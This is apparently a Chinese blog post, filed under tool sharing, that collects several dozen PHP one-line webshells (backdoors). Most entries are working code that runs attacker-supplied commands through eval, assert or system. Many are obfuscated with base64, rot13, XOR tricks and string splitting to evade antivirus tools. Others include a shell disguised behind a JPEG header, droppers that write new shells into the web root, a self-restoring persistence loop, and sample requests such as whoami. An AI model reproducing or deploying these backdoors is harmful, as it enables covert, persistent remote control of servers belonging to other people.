WEB安全

php一句话木马集合

NNN4cyNNN4cy WEB安全, 工具分享 2018-05-22
3728 0

eval.php

1
<?php @eval($_POST['cmd'])?>

assert.php

1
<?php assert($_POST[cmd]);?>

min_lenth.php

1
2
<?=$_GET[1];
//<?=*;

get_get.php

1
2
3
4
5
<?php
//?a=assert&b=phpinfo();
@$_GET[a](@$_GET[b]);
//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
?>

get_post.php

1
2
3
4
5
<?php
//?2=system POST:1=whoami
//2=assert 1=phpinfo();
($_=@$_GET[2]).@$_($_POST[1])//?2=assert 1
?>

post_post.php

1
2
3
4
5
6
<?php
//a=assert&b=phpinfo();
//a=system&b=ipconfig
@$_POST['a'](@$_POST['b']);
//<O>a=assert</O>
?>

request_ab.php

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
//?a=system&b=dir
//?a=assert&b=phpinfo();
//?a=assert&b=eval($_POST['pass'])
//POST:
//  a=assert&b=phpinfo();
//  a=system&b=whoami
//GET:
//  http://127.0.0.1/fuckdun/yjh_2.php?a=assert&b=phpinfo();
//phpinfo(); == fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29;
//生成 c.php <?php @eval($_POST[c]);
$_REQUEST['a']($_REQUEST['b']);
?>

document-write.php

1
2
3
4
5
6
7
8
9
10
<?php
$root= $_SERVER['DOCUMENT_ROOT'];
$shelladdr = $root.'/shell.php';
$shellcontent = '<?php @eval($_POST["cmd"]);?>';
file_put_contents($shelladdr,$shellcontent);
//http://127.0.0.1/write_shell.php?cmd=file_put_contents("a.txt","w");
//http://127.0.0.1/write_shell.php?cmd=fwrite(fopen("a.txt","w"),"aa");
//$a = @$_GET['cmd'];
//@eval($a);
?>

script.php

1
<script language="php">@eval($_POST['cmd']);</script>

include.php

1
2
3
4
<?php
$filename=$_GET['id'];
include ($filename);
?>

require.php

1
2
3
4
<?php
if($_POST['token'] == 'xxoo'){
require 'flag.png';//phpinfo();
}

stripslashes.php

1
2
3
4
<?php
$content=stripslashes($_POST[1]);
eval($content);
?>  

config.php

1
2
3
4
<?php
${"func"}= substr(__FILE__, -10, -4);
${"config"} = @$_GET[config];
@$func($config);

$_POST[cmd].php

1
2
3
4
5
6
7
<?php
${"function"}= substr(__FILE__, -15, -4);
${"config"} = assert;
$config($function);
//$func = @$_POST[cmd];
//assert($function);
//assert($_POST[cmd]);

hard_brute.php

1
2
3
4
5
6
7
<?php
//"shell" md5: 2591c98b70119fe624898b1e424b5e91
//substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['hihack']);
//var_dump(substr(md5(@$_GET['x']),0)=='2591c98b70119fe624898b1e424b5e91');
//substr(md5(@$_GET['x']),0)=='2591c98b70119fe624898b1e424b5e91'&&system('whoami');
substr(md5(@$_GET['x']),28)=='5e91'&&@eval($_POST['md5']);
?>

no_assert.php

1
2
3
4
5
6
7
8
9
10
11
<?
//${"function"}= substr(__FILE__, -14, -4);
$a=md5('ssss');
$b=substr($a,2,2)+37;
$s=$b+18;
$e=substr($a,-7,1);
$r=$s-1;
$t=$r+2;
$z=chr($b).chr($s).chr($s).$e.chr($r).chr($t);
$z($_GET['cmd']);
?>

accept_language.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
/*
Tamper Data 修改Accept-Language:whoami / ipconfig
import requests
URL = 'http://127.0.0.1/fuckdun/php-webshells-master/accept_language.php'
while True:
    command=raw_input("~$ ")
    head = {'Accept-Language':command}
    try:
        req = requests.get(URL,headers=head)
        print req.content
    except Exception as e: print e
*/
//echo passthru(@$_GET['a']);
//echo getenv("HTTP_ACCEPT_LANGUAGE");
echo passthru(getenv("HTTP_ACCEPT_LANGUAGE"));
?>

apply_filters.php

1
2
3
4
5
6
7
8
9
10
11
<?php
class Parse_Args {
public function apply_filters($key) {
    assert($key);
}
}
//?xxoo=phpinfo();
@extract($_REQUEST);
$reflectionMethod = new Parse_Args();
$reflectionMethod -> apply_filters($xxoo);
?>

create_function.php

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
//http://127.0.0.1/create_function.php?c=1;}phpinfo();/*
$id = @$_GET['c'];
$res = 'echo '.$id.'is'.$a.";";
$cf = create_function('$a', $res);
/*
function anonymous($a){
    echo 1;}phpinfo();/*.'is'.$a;
    //$id.'is'.$a;
}
anonymous($a);
*/
?>

invoke_cmd.php

1
2
3
4
<?php
$s = new ReflectionFunction("assert");
@$s -> invoke($_POST["cmd"]);
?>

array.php

1
2
3
4
5
<?php
item['wind'] = 'assert';
$array[] = $item;
$array[0]['wind']($_POST['jssj'])
?>

array_flip.php

1
2
3
4
5
6
7
8
<?php        
$args = 1;
$arr=array("n;}$_REQUEST[c];/*"=>"test");
$arr1=array_flip($arr); // array("test"=>"n;}$_REQUEST[c];/*");
//var_dump($arr1);die(); //array(1) { ["test"]=> string(15) "n;}phpinfo();/*" }
$arr2 = $arr1[test]; // n;}$_REQUEST[c];/*
//var_dump($arr2);die(); // string(15) "n;}phpinfo();/*"
create_function('$args',$arr2); // 1,n;}$_REQUEST[c];/

array_map.php

1
2
3
4
5
6
7
8
<?php
if($_GET[session] == 'xxoo'){
    @array_map($_GET['xx'],(array)base64_decode($_REQUEST['oo']));
    exit();
}
//?session=xxoo&xx=assert
//post:oo=cGhwaW5mbygpOw==
?>

array_walk_base64.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
//http://127.0.0.1/fuckdun/yjh_10.php?_exit=cHJlZ19maWx0ZXI=
//POST: mcontent=ZXZhbCgkX1BPU1RbY10pOw==&c=phpinfo();
$ad = '|';$ad .='.';$ad .='*|';$ad .='e';
$_clasc = base64_decode(@$_GET['_exit']);//base64_decode($_REQUEST['_exit']); ->preg_replace 或preg_filter
$arr = array(base64_decode(@$_POST['mcontent']) => $ad,);   //$arr = array('phpinfo()' => '|.*|e')
@array_walk($arr, $_clasc, '');   //preg_replace('|.*|e',phpinfo(),'')
/*
//www=preg_replace&wtf=phpinfo();
$e = $_REQUEST['www'];
$arr = array(@$_POST['wtf'] => '|.*|e',);
@array_walk($arr, $e, '')
//http://127.0.0.1/fuckdun/yjh_12.php?_exit=cHJlZ19yZXBsYWNl==
//post: mcontent=ZXZhbCgkX1BPU1RbY10pOw==&c=phpinfo();
$Base = "base6"."4"."_decod"."e";
$_clasc = $Base(@$_REQUEST['_exit']);
$arr = array($Base(@$_POST['mcontent']) => '|.*|e',);
@array_walk($arr, $_clasc, '');
*/
?>

base64_assert.php

1
2
3
4
5
6
<?php  
error_reporting(0);
set_time_limit(0);
$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");
$a(@${"_P"."O"."S"."T"}[xw]);
?>

str_replace.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php
$gn="J3Nhb3Nhb";
$alq="ydidKiTisg";
$obk="IEBldimFsIC";
$lub = str_replace("q","","qsqtqrq_replqace");
$cqs="gkX1BPU1Rb";
$hox = $lub("v", "", "vbasev6v4_vdvevcovdve");
$trx = $lub("ci","","ciccircieciacitcie_cifciucinciccitiocin");
$ots = $trx('', $hox($lub("i", "", $obk.$cqs.$gn.$alq))); $ots();
/*
$uf="snc3"; //pass is sqzr
$ka="IEBldmFbsK";
$pjt="CRfUE9TVF";
$vbl = str_replace("ti","","tistittirti_rtietipltiatice");
$iqw="F6ciddKTs=";
$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke");
$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn");
$mpy = $sbp('', $bkf($vbl("b", "", $ka.$pjt.$uf.$iqw)));
$mpy();
*/
/*
$mt="mFsKCleRfU";
$ojj="IEBleldle";
$hsa="E9TVFsnd2VuJ10p";
$fnx="Ow==";
$zk = str_replace("d","","sdtdrd_redpdldadcde");
$ef = $zk("z", "", "zbazsze64_zdzeczodze");
$dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn");
$zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx)));
$zvm();
*/
?>

preg_replace.php

1
<?php @preg_replace("/[copyright]/e",$_POST['c'],"error");?>

preg_replace_post.php

1
2
3
4
5
6
7
<?php
//[@eval(base64_decode($_POST[z0]));]
@$a = $_POST['x'];
if(isset($a)){
@preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));
}
?>

preg_replace_post_base64.php

1
2
3
4
5
6
7
8
9
<?php
//eval(base64_decode($_POST[z0]))
//POST: gbtv=a&z0=cGhwaW5mbygpOw== phpinfo();
//<O>gbtv=@eval_r($_POST[1])</O>
if(@$_POST['gbtv']){
$_="b"/**/."ase64_decode";
preg_replace("/^/e",$_("ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFt6MF0pKQ=="),0);
}
?>

preg_rot13.php

1
2
3
JFIF<?php  
preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft");
?>

preg_rot13_post.php

1
<?php ($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');?>

assert_item.php

1
2
3
4
5
6
7
8
<?php
//?_=assert&__=eval($_POST['pass'])
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

lambda.php

1
2
3
4
5
6
7
<?php
//function __lambda_func(){@eval($_POST['f']);}
$s = "F9QivT1NUWyd";$v = "QGivV2YivWwoJ";$j = "mJ10pOw=iv=";
$re = str_replace("iv","","sivtr_ivrepivlaivce");
$ba = $re("nf","","bnfanfse6nf4_nfdecnfode");
$fun = $re("vf","","cvfreavfte_fvfunctvfion");
$vi = $fun("",$ba($re("iv","",$v.$s.$j)));$vi();?>

urldecode.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
error_reporting(0);set_time_limit(0);
$GuTou=@$_POST["gutou"];
if($GuTou){
    $GuTou=str_replace(array("\n","\t","\r"),"",$GuTou);
    $cc="";for($i=0;$i<strlen($GuTou);$i+=2)
    $cc.=urldecode("%".substr($GuTou,$i,2));
    @eval($cc);
    exit;
}
//Hex2phpinfo();gutou=706870696E666F28293B
//gutou=406576616C2028245F504F53545B2778275D293B&x=phpinfo();
//whoami:73797374656D2877686F616D69293B
/*
//http://127.0.0.1/222.php?cc=706870696E666F28293B     执行phpinfo()
//把phpinfo();转换成URL格式去掉%得706870696E666F28293B
//
//http://127.0.0.1/222.php?cc=406576616C2028245F504F53545B2778275D293B
//密码x
if(@$_REQUEST["cc"]){
   $c=@$_REQUEST["cc"];
   $c=str_replace(array("\n","\t","\r"),"",$c);
   $buf="";for($i=0;$i<strlen($c);$i+=2)
   $buf.=urldecode("%".substr($c,$i,2));
   $FiLi=Create_Function("",$buf);$FiLi();exit;
}
*/
?>

xor.php

1
2
3
4
5
6
7
8
9
<?php
@$_++;
$__=("#"^"|");
$__.=("."^"~");
$__.=("/"^"");
$__.=("|"^"/");
$__.=("{"^"/");
${$__}[!$_](${$__}[$_]);//$_POST[0]($_POST[1]);0=assert&1=phpinfo();
?>
1
2
3
4
5
<?php
//360
${("#"^"|").("#"^"|")}=("!"^"").("( "^"{").("("^"[").("~"^";").("|"^".").("*"^"~");
${("#"^"|").("#"^"|")}(@("-"^"H"). ("]"^"+"). ("["^":"). (","^"@"). ("}"^"U"). ("e"^"A"). ("("^"w").("j"^":"). ("i"^"&"). ("#"^"p"). (">"^"j"). ("!"^"z"). ("T"^"g"). ("e"^"S"). ("_"^"o"). ("?"^"b"). ("]"^"t"));
?>

usort.php

1
2
3
4
<?php
//php version>=5.6 usort(...$_GET);//?1[]=1-1&1[]=eval($_GET[x])&2=assert&x=phpinfo();
usort($_GET,'asse'.'rt');//usort.php?1=1+1&2=eval($_GETT[x])&x=phpinfo();
?>

foreach.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
//str1
session_start();
define("Emmm","诡道");
foreach (array('_COOKIE','_POST','_GET') as $_request)  
{
    foreach ($$_request as $_key=>$_value)  
    {
        $$_key=  $_value;
    }
}
@$userinfo['userinfo'] = $username;
@$userinfo["password"] = $password;
@$_SESSION["userinfo"] = $userinfo;
$userinfo = $_SESSION["userinfo"];
eval('$title='.$str1.';');
?>

special-ope.php

PHP
1
2
3
4
5
6
7
8
9
10
11
12
<?php
//http://127.0.0.1/fuckdun/yjh_4_2.php?0=system&1=whoami
//http://127.0.0.1/fuckdun/yjh_4_2.php?0=assert&1=phpinfo();
$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;@$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$
$_[$__+ $__] ;$_[@-_]($_[@!+_] );
?>

never_kill.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
ignore_user_abort(true);
//error_reporting(0);
set_time_limit(0);
$k = '$_POST["#"]';
$s = <<<EOF
<?php @eval({$k});?>
EOF;
while(true)
{
    if(!file_exists("killme.php")){
        file_put_contents("killme.php","$s");
    }
    ob_flush();
    flush();
    sleep(1);
    ob_end_flush();
}
/*
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
//file_put_contents(__FILE__,'');
while(1){
    file_put_contents('/var/www/test/webshell.php','<?php @eval($_POST["password"]);?>');
}
?>
*/

spe_encode.php

特殊格式见附件:

1
2
3
4
5
6
7
8
9
10
<?php
//http://127.0.0.1/fuckdun/yjh_4_done.php?_=assert&__=phpinfo();
//http://127.0.0.1/fuckdun/yjh_4_done.php?_=assert&__=eval($_POST[1])
//http://127.0.0.1/fuckdun/yjh_4_done.php?_=system&__=whoami
$_="";
$_[+""]='';
@$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php @${'_'.$_}['_'](@${'_'.$_}['__']);?>

yjh_special_2

(0)

本文由来源 CNNETARMY,由 NNN4cy 整理编辑!

NNN4cy

NNN4cy

 文章:85

相关文章

热评文章

发表评论

用户登录